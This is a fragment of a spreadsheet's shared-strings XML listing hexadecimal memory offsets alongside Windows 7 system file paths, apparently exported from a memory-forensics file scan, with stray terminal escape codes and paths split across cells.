  <si>
    <t>0xdedf0b30</t>
  </si>
  <si>
    <t>0xdedf0e60</t>
  </si>
  <si>
    <t>0xdedf0f18</t>
  </si>
  <si>
    <t>0xdedf12e8</t>
  </si>
  <si>
    <t>0xdedf13a0</t>
  </si>
  <si>
    <t>0xdedf1788</t>
  </si>
  <si>
    <t>0xdedf18d0</t>
  </si>
  <si>
    <t>0xdedf1f80</t>
  </si>
  <si>
    <t>0xdedf20e8</t>
  </si>
  <si>
    <t>0xdedf21e0</t>
  </si>
  <si>
    <t>0xdedf2690</t>
  </si>
  <si>
    <t>0xdedf2748</t>
  </si>
  <si>
    <t>0xdedf2b30</t>
  </si>
  <si>
    <t>0xdedf2f18</t>
  </si>
  <si>
    <t>0xdedf33a0</t>
  </si>
  <si>
    <t>0xdedf34e8</t>
  </si>
  <si>
    <t>0xdedf3818</t>
  </si>
  <si>
    <t>0xdedf3b98</t>
  </si>
  <si>
    <t>0xdedf3ec8</t>
  </si>
  <si>
    <t>0xdedf3f80</t>
  </si>
  <si>
    <t>0xdedf4100</t>
  </si>
  <si>
    <t>0xdedf46f8</t>
  </si>
  <si>
    <t>0xdedf47b0</t>
  </si>
  <si>
    <t>0xdedf4ae0</t>
  </si>
  <si>
    <t>0xdedf4b98</t>
  </si>
  <si>
    <t>0xdedf4f80</t>
  </si>
  <si>
    <t>0xdedf53c8</t>
  </si>
  <si>
    <t>0xdedf57b0</t>
  </si>
  <si>
    <t>0xdedf5ae0</t>
  </si>
  <si>
    <t>0xdedf5b98</t>
  </si>
  <si>
    <t>0xdedf5f80</t>
  </si>
  <si>
    <t>0xdedf63a0</t>
  </si>
  <si>
    <t>0xdedf64e8</t>
  </si>
  <si>
    <t>0xdedf6b98</t>
  </si>
  <si>
    <t>0xdedf6ec8</t>
  </si>
  <si>
    <t>0xdedf6f80</t>
  </si>
  <si>
    <t>0xdedf7310</t>
  </si>
  <si>
    <t>0xdedf73c8</t>
  </si>
  <si>
    <t>0xdedf77b0</t>
  </si>
  <si>
    <t>0xdedf7ae0</t>
  </si>
  <si>
    <t>0xdedf7b98</t>
  </si>
  <si>
    <t>0xdedf7ec8</t>
  </si>
  <si>
    <t>0xdedf7f80</t>
  </si>
  <si>
    <t>0xdedf83c8</t>
  </si>
  <si>
    <t>0xdedf86f8</t>
  </si>
  <si>
    <t>0xdedf87b0</t>
  </si>
  <si>
    <t>0xdedf8b98</t>
  </si>
  <si>
    <t>0xdedf8ec8</t>
  </si>
  <si>
    <t>0xdedf8f80</t>
  </si>
  <si>
    <t>0xdedf92e8</t>
  </si>
  <si>
    <t>0xdedf93a0</t>
  </si>
  <si>
    <t>0xdedf96d0</t>
  </si>
  <si>
    <t>0xdedf9788</t>
  </si>
  <si>
    <t>0xdedf98d0</t>
  </si>
  <si>
    <t>0xdedf9c00</t>
  </si>
  <si>
    <t>0xdedf9f80</t>
  </si>
  <si>
    <t>0xdedfa3c8</t>
  </si>
  <si>
    <t>0xdedfa690</t>
  </si>
  <si>
    <t>0xdedfa7b0</t>
  </si>
  <si>
    <t>0xdedfaae0</t>
  </si>
  <si>
    <t>0xdedfab98</t>
  </si>
  <si>
    <t>0xdedfaf80</t>
  </si>
  <si>
    <t>0xdedfb2a8</t>
  </si>
  <si>
    <t>0xdedfb3c8</t>
  </si>
  <si>
    <t>0xdedfb7b0</t>
  </si>
  <si>
    <t>0xdedfbb98</t>
  </si>
  <si>
    <t>0xdedfbe60</t>
  </si>
  <si>
    <t>0xdedfbf80</t>
  </si>
  <si>
    <t>0xdedfc3c8</t>
  </si>
  <si>
    <t>0xdedfc690</t>
  </si>
  <si>
    <t>0xdedfc7b0</t>
  </si>
  <si>
    <t>0xdedfcb98</t>
  </si>
  <si>
    <t>0xdedfcec8</t>
  </si>
  <si>
    <t>0xdedfcf80</t>
  </si>
  <si>
    <t>0xdedfd248</t>
  </si>
  <si>
    <t>0xdedfd300</t>
  </si>
  <si>
    <t>0xdedfd6f8</t>
  </si>
  <si>
    <t>0xdedfd7b0</t>
  </si>
  <si>
    <t>0xdedfdb98</t>
  </si>
  <si>
    <t>0xdedfdf80</t>
  </si>
  <si>
    <t>0xdedfe360</t>
  </si>
  <si>
    <t>0xdedfe690</t>
  </si>
  <si>
    <t>0xdedfe748</t>
  </si>
  <si>
    <t>0xdedfeb30</t>
  </si>
  <si>
    <t>0xdedfef18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2491683_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K_x001B_[1</t>
  </si>
  <si>
    <t>0xdedff3d8</t>
  </si>
  <si>
    <t>0xdedff490</t>
  </si>
  <si>
    <t>0xdedff878</t>
  </si>
  <si>
    <t>0xdedffa10</t>
  </si>
  <si>
    <t>0xdedffb30</t>
  </si>
  <si>
    <t>0xdedfff18</t>
  </si>
  <si>
    <t>0xdee1e810</t>
  </si>
  <si>
    <t>\Windows\bootstat.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdee1ee50</t>
  </si>
  <si>
    <t>0xdee32b80</t>
  </si>
  <si>
    <t>0xdee37638</t>
  </si>
  <si>
    <t>0xdee39278</t>
  </si>
  <si>
    <t>\Windows\ehome\WTVGOTHIC-S.ttc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdee39a68</t>
  </si>
  <si>
    <t>0xdee3b758</t>
  </si>
  <si>
    <t>\Windows\System32\config\TxR\{6cced301-6e01-11de-8bed-001e0bcd1824}.TMContainer000000000000000</t>
  </si>
  <si>
    <t>00001.regtran</t>
  </si>
  <si>
    <t>0xdee3c9a0</t>
  </si>
  <si>
    <t>0xdee3eed8</t>
  </si>
  <si>
    <t>0xdee3f388</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Config\TxR\{6cced301-6e01-11de-8bed-001e0bcd1824}.TM_x001B_[0K</t>
  </si>
  <si>
    <t>0xdee3f638</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\dxapi.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdee40480</t>
  </si>
  <si>
    <t>0xdee40be0</t>
  </si>
  <si>
    <t>0xdee42b68</t>
  </si>
  <si>
    <t>\Windows\System32\config\RegBack\SOFTWARE_x001B_[0K</t>
  </si>
  <si>
    <t>0xdee44f80</t>
  </si>
  <si>
    <t>0xdee459b0</t>
  </si>
  <si>
    <t>0xdee46600</t>
  </si>
  <si>
    <t>\pagefile.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdee47ed8</t>
  </si>
  <si>
    <t>0xdee4b6a8</t>
  </si>
  <si>
    <t>\Windows\System32\config\DEFAULT.LOG1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeb47a0</t>
  </si>
  <si>
    <t>\Windows\System32\win32k.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeb86f8</t>
  </si>
  <si>
    <t>0xdeeb89d8</t>
  </si>
  <si>
    <t>\Windows\System32\config\DEFAULT.LOG2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeb9680</t>
  </si>
  <si>
    <t>\Windows\System32\config\RegBack\DEFAULT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeb97c8</t>
  </si>
  <si>
    <t>\Windows\System32\csrss.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeba320</t>
  </si>
  <si>
    <t>0xdeeba3d8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\csrss.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeba968</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\dxg.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeebb4b8</t>
  </si>
  <si>
    <t>\Windows\System32\basesrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeebba60</t>
  </si>
  <si>
    <t>\Windows\System32\locale.nls_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeebbb18</t>
  </si>
  <si>
    <t>\Windows\System32\csrsrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeebbc98</t>
  </si>
  <si>
    <t>0xdeebc310</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\winsrv.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeebc808</t>
  </si>
  <si>
    <t>0xdeebccf8</t>
  </si>
  <si>
    <t>\Windows\System32\winsrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeebdf80</t>
  </si>
  <si>
    <t>\Windows\Fonts\mingliub.ttc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeebeae0</t>
  </si>
  <si>
    <t>\Windows\System32\FNTCACHE.DAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeebf928</t>
  </si>
  <si>
    <t>0xdeebff80</t>
  </si>
  <si>
    <t>\Windows\Fonts\cambria.ttc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeec08d8</t>
  </si>
  <si>
    <t>0xdeec1038</t>
  </si>
  <si>
    <t>\Windows\System32\rasmontr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeec1490</t>
  </si>
  <si>
    <t>\Windows\System32\spp\tokens\ppdlic\Microsoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeec15d8</t>
  </si>
  <si>
    <t>\Windows\System32\spp\tokens\ppdlic\SMBServer-ppdlic.xrm-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeec1b58</t>
  </si>
  <si>
    <t>0xdeec1d08</t>
  </si>
  <si>
    <t>\Windows\System32\wshelper.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeec2338</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web\18cb6734a97378f13d3479d00d737fcc\Syste</t>
  </si>
  <si>
    <t>m.Web.ni.dll.</t>
  </si>
  <si>
    <t>0xdeec27f0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Mic</t>
  </si>
  <si>
    <t>rosoft.JScrip</t>
  </si>
  <si>
    <t>0xdeec28a8</t>
  </si>
  <si>
    <t>\Windows\System32\DHCPQEC.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeec2b90</t>
  </si>
  <si>
    <t>\Windows\System32\odbcint.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeec2e60</t>
  </si>
  <si>
    <t>\Windows\System32\odbc32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeec9258</t>
  </si>
  <si>
    <t>\Windows\Fonts\simsun.ttc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeec9310</t>
  </si>
  <si>
    <t>\Windows\Fonts\tahoma.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeec99e0</t>
  </si>
  <si>
    <t>\Windows\AppPatch\AcGenral.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeec9af8</t>
  </si>
  <si>
    <t>\Windows\Fonts\malgun.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeec9d48</t>
  </si>
  <si>
    <t>0xdeec9e00</t>
  </si>
  <si>
    <t>\Windows\Fonts\meiryo.ttc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeec9eb8</t>
  </si>
  <si>
    <t>\Windows\Fonts\mingliu.ttc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeed2a38</t>
  </si>
  <si>
    <t>\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005</t>
  </si>
  <si>
    <t>A0_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeed2c00</t>
  </si>
  <si>
    <t>xmllite.dll</t>
  </si>
  <si>
    <t>0xdeed2cb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\pending.xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeed2ef0</t>
  </si>
  <si>
    <t>\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005</t>
  </si>
  <si>
    <t>A0_x001B_[0K_x001B_[44G</t>
  </si>
  <si>
    <t>0xdeed3948</t>
  </si>
  <si>
    <t>0xdeed3c70</t>
  </si>
  <si>
    <t>0xdeed3d28</t>
  </si>
  <si>
    <t>0xdeed3de0</t>
  </si>
  <si>
    <t>0xdeed3ec8</t>
  </si>
  <si>
    <t>\Windows\System32\spp\tokens\ppdlic\PeerToPeerBase-ppdlic.xrm-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeed71b8</t>
  </si>
  <si>
    <t>\Windows\System32\ndiscapCfg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeed7338</t>
  </si>
  <si>
    <t>\Windows\inf\lltdio.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeed73f0</t>
  </si>
  <si>
    <t>\Windows\inf\ndisuio.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeed78a8</t>
  </si>
  <si>
    <t>\Windows\System32\tsgqec.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeed7a58</t>
  </si>
  <si>
    <t>\Windows\System32\mfc42u.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeed7d40</t>
  </si>
  <si>
    <t>\Windows\System32\QUTIL.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeda1d8</t>
  </si>
  <si>
    <t>\Windows\Fonts\msyh.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeda470</t>
  </si>
  <si>
    <t>\Windows\Fonts\msjh.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeda528</t>
  </si>
  <si>
    <t>\Windows\Fonts\msgothic.ttc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeedaab0</t>
  </si>
  <si>
    <t>\Windows\Fonts\gulim.ttc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeedab68</t>
  </si>
  <si>
    <t>0xdeedb3f0</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-PrintService%4Admin.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeedb6b0</t>
  </si>
  <si>
    <t>\Windows\System32\config\TxR\{6cced300-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeedba28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeedc3c8</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1D</t>
  </si>
  <si>
    <t>6F23D99D44085</t>
  </si>
  <si>
    <t>244DB44686B</t>
  </si>
  <si>
    <t>5A2A59</t>
  </si>
  <si>
    <t>0xdeedcaa8</t>
  </si>
  <si>
    <t>70}\mpengine.</t>
  </si>
  <si>
    <t>0xdeedd5e0</t>
  </si>
  <si>
    <t>0xdeedd848</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\69</t>
  </si>
  <si>
    <t>6F3DE637E6DE8</t>
  </si>
  <si>
    <t>5B458996D49</t>
  </si>
  <si>
    <t>D759AD</t>
  </si>
  <si>
    <t>0xdeedd918</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.</t>
  </si>
  <si>
    <t>0xdeedd9d0</t>
  </si>
  <si>
    <t>0xdeeddf18</t>
  </si>
  <si>
    <t>0xdeede258</t>
  </si>
  <si>
    <t>0xdeede920</t>
  </si>
  <si>
    <t>\Windows\System32\msidle.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeedeb60</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\en-US\netrast.inf_loc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeedecb8</t>
  </si>
  <si>
    <t>0xdeedf418</t>
  </si>
  <si>
    <t>0xdeedf4d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework.Luna\v4.0_4.0.0.0__31bf3856ad36</t>
  </si>
  <si>
    <t>4e35\Presenta</t>
  </si>
  <si>
    <t>rk.Lun</t>
  </si>
  <si>
    <t>a.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeedf820</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\Syst</t>
  </si>
  <si>
    <t>em.Management</t>
  </si>
  <si>
    <t>0xdeedfa98</t>
  </si>
  <si>
    <t>0xdeee03c8</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\696</t>
  </si>
  <si>
    <t>F3DE637E6DE85</t>
  </si>
  <si>
    <t>B458996D49D</t>
  </si>
  <si>
    <t>759AD_x001B_</t>
  </si>
  <si>
    <t>0xdeee0640</t>
  </si>
  <si>
    <t>0xdeee0db8</t>
  </si>
  <si>
    <t>0xdeee1038</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1D6</t>
  </si>
  <si>
    <t>F23D99D440852</t>
  </si>
  <si>
    <t>44DB44686B5</t>
  </si>
  <si>
    <t>A2A59_x001B_</t>
  </si>
  <si>
    <t>0xdeee12b8</t>
  </si>
  <si>
    <t>\Windows\inf\nettcpip.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee18e0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\e8b82128949c9d8268bdacec79c67810\</t>
  </si>
  <si>
    <t>System.Xml.Li</t>
  </si>
  <si>
    <t>nq.ni.dll_x001B_[</t>
  </si>
  <si>
    <t>0xdeee1b60</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F90</t>
  </si>
  <si>
    <t>F18257CBB4D84</t>
  </si>
  <si>
    <t>216AC1E1F3B</t>
  </si>
  <si>
    <t>B2C76_x001B_</t>
  </si>
  <si>
    <t>0xdeee1c18</t>
  </si>
  <si>
    <t>\Windows\inf\netvwififlt.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee1e00</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F9</t>
  </si>
  <si>
    <t>0F18257CBB4D8</t>
  </si>
  <si>
    <t>4216AC1E1F3</t>
  </si>
  <si>
    <t>BB2C76</t>
  </si>
  <si>
    <t>0xdeee2150</t>
  </si>
  <si>
    <t>\Windows\inf\rspndr.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee2410</t>
  </si>
  <si>
    <t>\Windows\inf\puwk.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee25f8</t>
  </si>
  <si>
    <t>\Windows\inf\printupg.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee26d0</t>
  </si>
  <si>
    <t>\Windows\inf\secrecs.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee2b28</t>
  </si>
  <si>
    <t>\Windows\inf\netvwifimp.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee2be0</t>
  </si>
  <si>
    <t>0xdeee2dc8</t>
  </si>
  <si>
    <t>\Windows\inf\netsstpa.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee3750</t>
  </si>
  <si>
    <t>\Windows\inf\sceregvl.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee3ec8</t>
  </si>
  <si>
    <t>\Windows\inf\wfplwf.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee5f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_microsoft-windows-g..acheclean-venezuela_31bf3856ad364e35_6.1.7601.24252_n</t>
  </si>
  <si>
    <t>one_a82cd0563</t>
  </si>
  <si>
    <t>7918da8\cle</t>
  </si>
  <si>
    <t>anupin</t>
  </si>
  <si>
    <t>tlcache.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee65d8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\68143780a7b7d8ae84ba34dc4645</t>
  </si>
  <si>
    <t>6934\Presenta</t>
  </si>
  <si>
    <t>rk.ni.</t>
  </si>
  <si>
    <t>0xdeee7038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPB13D.tmp\PresentationFramework.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee7a10</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-gb_theme_8a4ff6a06b18c1d8.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee7f18</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\PresentationFramework\3.0.0.0__31bf3856ad364e35\PresentationFramewo</t>
  </si>
  <si>
    <t>rk.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee8368</t>
  </si>
  <si>
    <t>\Windows\System32\CertEnroll.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee86f0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee94e8</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Audit.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeee9ef0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework.Classic\v4.0_4.0.0.0__31bf3856a</t>
  </si>
  <si>
    <t>d364e35\Prese</t>
  </si>
  <si>
    <t>ntationFram</t>
  </si>
  <si>
    <t>Classic.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeea200</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.</t>
  </si>
  <si>
    <t>Drawing.dll_x001B_[</t>
  </si>
  <si>
    <t>0xdeeeaa40</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft-windows-smbserver_31bf3856ad364e35_6.1.7601.17514_none</t>
  </si>
  <si>
    <t>_fafc52e4491d</t>
  </si>
  <si>
    <t>969c.manife</t>
  </si>
  <si>
    <t>0xdeeeb228</t>
  </si>
  <si>
    <t>\Windows\System32\version.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeeb478</t>
  </si>
  <si>
    <t>\Windows\Fonts\msmincho.ttc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeebb68</t>
  </si>
  <si>
    <t>\Windows\System32\mswsock.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeebc90</t>
  </si>
  <si>
    <t>0xdeeebd48</t>
  </si>
  <si>
    <t>\Windows\Fonts\simsunb.ttf_x001B_[0K_x001B_[26G</t>
  </si>
  <si>
    <t>0xdeeebe00</t>
  </si>
  <si>
    <t>\Windows\Fonts\msjhbd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeec5f8</t>
  </si>
  <si>
    <t>\Windows\System32\netiohlp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeed118</t>
  </si>
  <si>
    <t>\Windows\System32\dot3api.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeed1d0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\FirewallAPI.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeeddd0</t>
  </si>
  <si>
    <t>0xdeeee600</t>
  </si>
  <si>
    <t>\Windows\System32\wlms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeee9b0</t>
  </si>
  <si>
    <t>\Windows\inf\rspndr.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeeeb30</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft-windows-workstationservice_31bf3856ad364e35_6.1.7601.2</t>
  </si>
  <si>
    <t>4136_none_ceb</t>
  </si>
  <si>
    <t>7318a4e403f</t>
  </si>
  <si>
    <t>f9.man</t>
  </si>
  <si>
    <t>ifest_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeeee88</t>
  </si>
  <si>
    <t>0xdeeef4a8</t>
  </si>
  <si>
    <t>\Windows\System32\onex.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeef690</t>
  </si>
  <si>
    <t>\Windows\System32\dot3cfg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeef8f0</t>
  </si>
  <si>
    <t>\Windows\System32\netshell.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeeff00</t>
  </si>
  <si>
    <t>\Windows\System32\hnetmon.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef0f80</t>
  </si>
  <si>
    <t>\Windows\System32\rpcnsh.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef1b48</t>
  </si>
  <si>
    <t>0xdeef2300</t>
  </si>
  <si>
    <t>\Windows\System32\eappprxy.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef2798</t>
  </si>
  <si>
    <t>\Windows\System32\activeds.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef2850</t>
  </si>
  <si>
    <t>\Windows\System32\eappcfg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef2a10</t>
  </si>
  <si>
    <t>\Windows\System32\certcli.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef33b0</t>
  </si>
  <si>
    <t>\Windows\System32\NAPMONTR.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef4038</t>
  </si>
  <si>
    <t>0xdeef4688</t>
  </si>
  <si>
    <t>0xdeef4ad8</t>
  </si>
  <si>
    <t>0xdeef5360</t>
  </si>
  <si>
    <t>0xdeef5890</t>
  </si>
  <si>
    <t>\Windows\System32\polstore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef5a58</t>
  </si>
  <si>
    <t>\Windows\System32\adsldpc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef5b10</t>
  </si>
  <si>
    <t>\Windows\System32\ndfapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef5f38</t>
  </si>
  <si>
    <t>\Windows\System32\nshipsec.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef6608</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\tmp.edb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef6a88</t>
  </si>
  <si>
    <t>\Windows\inf\dshowext.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef6d08</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Printing\004b50be83a816cdefec_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef7038</t>
  </si>
  <si>
    <t>\Windows\inf\netavpnt.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef72f0</t>
  </si>
  <si>
    <t>0xdeef77c8</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_microsoft-windows-wmi-cmiplugin_31bf3856ad364e35_6.1.7601.17514_none_bf09f</t>
  </si>
  <si>
    <t>6d28a49e5c1\w</t>
  </si>
  <si>
    <t>micmiplugin</t>
  </si>
  <si>
    <t>0xdeef7d08</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mprmsg.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef7f80</t>
  </si>
  <si>
    <t>\Windows\System32\mprmsg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef8b48</t>
  </si>
  <si>
    <t>\Windows\System32\sdbinst.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef8e48</t>
  </si>
  <si>
    <t>\Windows\System32\nettrace.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef9240</t>
  </si>
  <si>
    <t>\Windows\System32\wlanutil.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef93f0</t>
  </si>
  <si>
    <t>\Windows\System32\p2pcollab.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef96a8</t>
  </si>
  <si>
    <t>\Windows\System32\pautoenr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef9888</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeef9d98</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\UIAutomationProvider\3.0.0.0__31bf3856ad364e35\UIAutomationProvider</t>
  </si>
  <si>
    <t>0xdeefa758</t>
  </si>
  <si>
    <t>\Windows\System32\wlanapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefac30</t>
  </si>
  <si>
    <t>0xdeefaeb8</t>
  </si>
  <si>
    <t>\Windows\System32\WcnNetsh.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefb230</t>
  </si>
  <si>
    <t>\Windows\System32\tcpipcfg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefb7d8</t>
  </si>
  <si>
    <t>0xdeefb890</t>
  </si>
  <si>
